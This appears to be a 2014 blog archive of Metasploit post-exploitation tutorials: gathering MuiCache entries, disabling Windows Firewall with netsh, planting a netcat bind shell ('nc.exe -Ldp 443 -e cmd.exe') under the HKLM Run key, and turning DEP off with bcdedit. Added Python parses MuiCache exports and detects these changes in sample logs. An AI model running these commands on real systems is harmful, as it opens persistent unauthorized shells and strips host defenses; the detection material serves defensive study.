Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extracts the application name from the version resource of the exe file, and stores it for later use in a Registry key known as the ‘MuiCache’.”

The key lives in the per-user hive: HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache on XP/2003 and HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache (backed by UsrClass.dat) on Vista and later. Because an entry is written when a program is launched through the shell, the cache is a record of what each user has actually run, including executables that have since been deleted. That makes it useful both for an attacker mapping a target (installed tools, security products, admin utilities) and for a forensic examiner reconstructing user activity.

use post/windows/gather/enum_muicache

This is a post-exploitation module: it runs over a Meterpreter session you already have, so there is no payload or LHOST to configure. The only required option is the session id (show options lists it).

msf post(enum_muicache) > set SESSION 2

msf post(enum_muicache) > run

The module walks the MuiCache key of the user profiles on the target and prints the executable paths and names it finds.
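When the same data is handled offline, for instance from a reg export of the key taken during the engagement or from a forensic image, a small parser is handy. The Python below is an added example for this post, not code from the blog, from Nirsoft or from the Metasploit module; it parses both MuiCache layouts out of a constructed .reg export (the sample text is made up) and flags executables that were launched from a user profile or temp directory, which is where dropped tooling usually lives.

```python
"""Parse MuiCache entries out of a .reg export.

Two layouts exist and both are handled:
  * Windows XP / 2003: HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache
      value name = executable path, data = friendly name
  * Vista and later:  HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
      value name = "<path>.FriendlyAppName" or "<path>.ApplicationCompany"
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of what `reg export <key> out.reg` produces. On disk a .reg
# file is normally UTF-16LE with a BOM; decode it before passing the text in.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"LangID"=hex:09,04
"C:\\Program Files\\7-Zip\\7zFM.exe.FriendlyAppName"="7-Zip File Manager"
"C:\\Program Files\\7-Zip\\7zFM.exe.ApplicationCompany"="Igor Pavlov"
"C:\\Users\\bob\\Downloads\\update.exe.FriendlyAppName"="Windows Update Helper"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@C:\\WINDOWS\\system32\\shell32.dll,-22067"="Printers and Faxes"
"C:\\WINDOWS\\system32\\notepad.exe"="Notepad"
"C:\\Documents and Settings\\bob\\Desktop\\nc.exe"="nc"
'''

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')
# Executables under a profile or temp directory deserve a closer look than Program Files.
PROFILE_MARKERS = ("\\users\\", "\\documents and settings\\", "\\downloads\\", "\\temp\\", "\\appdata\\")


def _unescape(s: str) -> str:
    # .reg escapes exactly two characters, backslash and double quote, with a backslash.
    return re.sub(r'\\(.)', r'\1', s)


@dataclass
class MuiCacheEntry:
    path: str
    key: str
    friendly_name: str = ""
    company: str = ""


def parse_reg_text(text: str) -> list[MuiCacheEntry]:
    """Return one entry per executable found under any MuiCache key in the export."""
    entries: dict[tuple[str, str], MuiCacheEntry] = {}
    current_key = ""
    for raw in text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group("key")
            continue
        if "muicache" not in current_key.lower():
            continue                      # values under unrelated keys
        value_match = VALUE_RE.match(line)
        if not value_match:
            continue                      # blank line or file header
        name = _unescape(value_match.group("name"))
        data = value_match.group("data")
        if not (data.startswith('"') and data.endswith('"')):
            continue                      # hex:/dword: values such as LangID are not entries
        if name.startswith("@"):
            continue                      # "@dll,-id" rows are cached resource strings, not launches
        data = _unescape(data[1:-1])
        lowered = name.lower()
        if lowered.endswith(".friendlyappname"):            # Vista+ layout
            path, attr = name[: -len(".FriendlyAppName")], "friendly_name"
        elif lowered.endswith(".applicationcompany"):
            path, attr = name[: -len(".ApplicationCompany")], "company"
        else:                                                # XP layout: the name is the path
            path, attr = name, "friendly_name"
        entry = entries.setdefault((current_key, path.lower()), MuiCacheEntry(path=path, key=current_key))
        setattr(entry, attr, data)
    return list(entries.values())


def launched_from_profile(entries: list[MuiCacheEntry]) -> list[MuiCacheEntry]:
    """Triage helper: entries whose executable ran from a user profile or temp location."""
    return [e for e in entries if any(m in e.path.lower() for m in PROFILE_MARKERS)]


if __name__ == "__main__":
    for e in parse_reg_text(SAMPLE_REG):
        print(f"{e.path:55} {e.friendly_name!r:28} {e.company!r}")
```

Layout detection is done on the value-name suffix rather than on the key path, so an export taken from a loaded UsrClass.dat hive (where the key path differs) parses the same way.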


How to Disable Windows Firewall using Metasploit



Windows Firewall is the host-based packet filter that ships with Windows. From Vista and 7 onward it is profile-aware: each network profile (Domain, Home/Work, Public) carries its own rule set and on/off state, so a machine can block every unsolicited inbound connection on a public network and relax that at home or at work. For an attacker that filter is what stands between a freshly planted listener and the rest of the network, which is why post-exploitation tutorials switch it off.

Command (run from a Meterpreter shell, or any command prompt, with administrative privileges):

netsh firewall set opmode disable

netsh firewall is the Windows XP/Server 2003 context. Vista and 7 still accept it for compatibility but print a deprecation notice; the supported form is the advfirewall context, where `netsh advfirewall set allprofiles state off` disables the filter for all three profiles. Either change is recorded in the firewall's own event log and is an obvious indicator to defenders, so restore the original state (enable, or state on) when the engagement ends.

Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When an attacker successfully compromises a system, they need to keep their access. That is why attackers usually install a backdoor on the victim computer: it lets them reconnect later, use the victim's resources and collect data without having to exploit the machine again.

1 - Upload netcat to the remote system. An elevated Meterpreter session is assumed, since writing to System32 and to HKLM requires administrative rights. The backslashes in the Windows path are doubled because the Meterpreter console treats a single backslash as an escape character.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - List what is already registered under the HKLM Run key, so the new value does not clash with an existing name (this step only reads; the value is written in the next step). Everything under this key is started at logon, for every user who logs on.
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - Add netcat as a Run value. The options are those of the Windows nc.exe build: -L re-listens after each client disconnects (so the shell survives a dropped connection), -d detaches from the console, -p 443 is the listening port and -e cmd.exe hands a cmd.exe to whoever connects. Nothing listens until the next logon, and the listener then runs with the privileges of the user who logged on, not as SYSTEM. Windows Firewall will block inbound 443 unless it is disabled or an inbound rule is added, and the result is an unauthenticated bind shell: anyone who can reach the port gets the same access, so this is not something to leave behind on a client system.
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - Confirm that the value was written and reads back correctly
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Wednesday, 9 July 2014

How to stop Data Execution Prevention (DEP) using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that helps prevent damage to your computer from viruses and other security threats. Malicious code frequently works by getting the CPU to execute instructions placed in memory that was only meant to hold data (the stack, the heap, a buffer it just overflowed). With DEP, Windows marks those pages non-executable using the processor's NX/XD bit.

If a program then tries to run code from a data page, the CPU faults, Windows terminates the program and notifies the user. The effect for an exploit writer is that plain shellcode written into a buffer no longer runs, which is why techniques such as return-oriented programming exist.

Command : bcdedit.exe /set {current} nx AlwaysOff

{current} is the boot entry the machine is running from. The command needs administrative privileges and the new setting only takes effect after a reboot; AlwaysOff then turns DEP off for every process on the machine. The other values are OptIn (the default on client Windows: only Windows binaries and programs that ask for it are protected), OptOut (everything except an exclusion list) and AlwaysOn. Put the original value back with `bcdedit.exe /set {current} nx OptIn` (or whatever bcdedit /enum {current} showed before the change) when you are done.
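The three changes on this page (firewall off, a netcat bind shell under the Run key, DEP off) are all host configuration changes that leave telemetry behind. The Python below is an added example written for this page, not code from the blog or from Metasploit: it runs simple detection rules over constructed sample events shaped like Sysmon/Security process-creation and registry-set events (none of the log lines are real). Two event kinds are modelled on purpose, because Meterpreter's reg setval writes through the registry API from inside the injected process and never launches reg.exe, so a rule that only watches command lines would miss the Run-key backdoor.

```python
"""Detection logic for the host changes described on this page, run over
constructed sample telemetry (not real logs).

Event kinds modelled:
  * process creation (Sysmon Event ID 1 / Security 4688): image + command line
  * registry value set (Sysmon Event ID 13 / Security 4657): key, value name, data
"""
import re

# Constructed events; the fields mirror what the named Sysmon/Security events carry.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall set opmode disable"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"type": "process", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit.exe /set {current} nx AlwaysOff"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},            # benign: read-only
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "nc", "data": r"C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive",
     "data": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},  # benign
]

PROCESS_RULES = [
    # legacy XP/2003 context, still accepted (with a deprecation notice) on Vista/7
    ("firewall_disabled_legacy",
     re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode=)?disable\b", re.I)),
    # current context: any profile (domainprofile/privateprofile/publicprofile/allprofiles) off
    ("firewall_disabled",
     re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    # DEP turned off for every process; takes effect at next boot
    ("dep_disabled",
     re.compile(r"\bbcdedit(\.exe)?\b.*\bnx\s+AlwaysOff\b", re.I)),
]
# Sysmon's TargetObject carries the value name after the key, so allow one trailing component.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\[^\\]+)?$", re.I)
# nc/ncat binaries, or anything that hands a shell to whoever connects (-e cmd.exe)
SHELL_BIND_RE = re.compile(r"\bn(c|cat)(64)?\.exe\b|\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)


def match_rules(event: dict) -> list:
    """Names of the rules a single event triggers (empty list if none)."""
    hits = []
    if event["type"] == "process":
        hits.extend(name for name, rx in PROCESS_RULES if rx.search(event["cmdline"]))
    elif event["type"] == "registry":
        if RUN_KEY_RE.search(event["key"]) and SHELL_BIND_RE.search(event["data"]):
            hits.append("run_key_command_shell")
    return hits


def scan(events: list) -> list:
    """(event index, rule name) for every hit, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name in match_rules(ev)]


if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        detail = ev.get("cmdline") or f"{ev['key']} {ev['value']} = {ev['data']}"
        print(f"[{name}] {detail}")
```

The two benign events (a read-only netsh query and a normal OneDrive Run entry) are there to show the rules do not fire on ordinary administration; in production you would still tune the Run-key rule against your own software inventory rather than rely on the binary name alone.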